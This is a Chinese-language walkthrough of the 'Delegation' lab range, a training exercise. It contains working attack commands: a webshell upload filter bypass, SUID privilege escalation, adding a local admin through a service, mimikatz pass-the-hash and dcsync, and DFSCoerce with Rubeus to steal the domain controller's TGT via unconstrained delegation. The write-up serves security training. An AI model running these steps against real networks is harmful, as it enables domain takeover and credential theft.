【打靶练习】Delegation
【打靶练习】Delegation
0x00前言
Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
入口
进入后台getshell
弱口令admin/123456
这里可以添加后缀。但是php不被允许,所以可以填phtml
经过测试发现是拦截了<?php ?> 这里去掉?>即可
提权
suid查到
这里有个diff可以suid提权以root权限读取
flag1
横向
这里给了个提示 Here is the hint: WIN19\Adrian 先看看本机网段,然后探测一下c段
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.7:445 open
172.22.4.19:445 open
172.22.4.45:445 open
172.22.4.7:139 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server获得密码
根据提示,给的是win19的账户,所以现在爆破下他的密码 发现提示个过期密码
这里可以切rdesktop然后改个密码就好了
提权
发现权限比较高
按这样添加个管理员权限就好了 "C:\Windows\System32\cmd.exe" /c net localgroup administrators Adrian /add 然后启动服务 sc start gupdate
flag2
分析
先用mimikatz pth一下机器hash然后以机器账户的身份启个cmd去运行SharpHound.exe这样就能获取到域的信息 SharpHound.exe -c all -d xiaorang.lab (注意这里一定要-d不然dump下来的zip,bloodhound分析不了)
点击这个查找到无约束委派的最短路径
可以看到dc和win19都可以非约束委派
非约束委派
上传 Rubeus.exe 监听 TGTRubeus.exe monitor /interval:1 /filteruser:DC01然后本地运行DFSCoerce去强制dc进行身份验证。然后rubeus就收到了来自dc的TGTpython dfscoerce.py -u WIN19 -hashes :a91969d7ad569d8591027fa9d707b3ad -d xiaorang.lab win19 172.22.4.7导入Rubeus.exe ptt /ticket:klist查看已经成功存储到内存了然后直接dcsync获取administrator hashmimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" "exit"
结束flag03-04
然后一个个去读flag就好了
腾讯云开发者
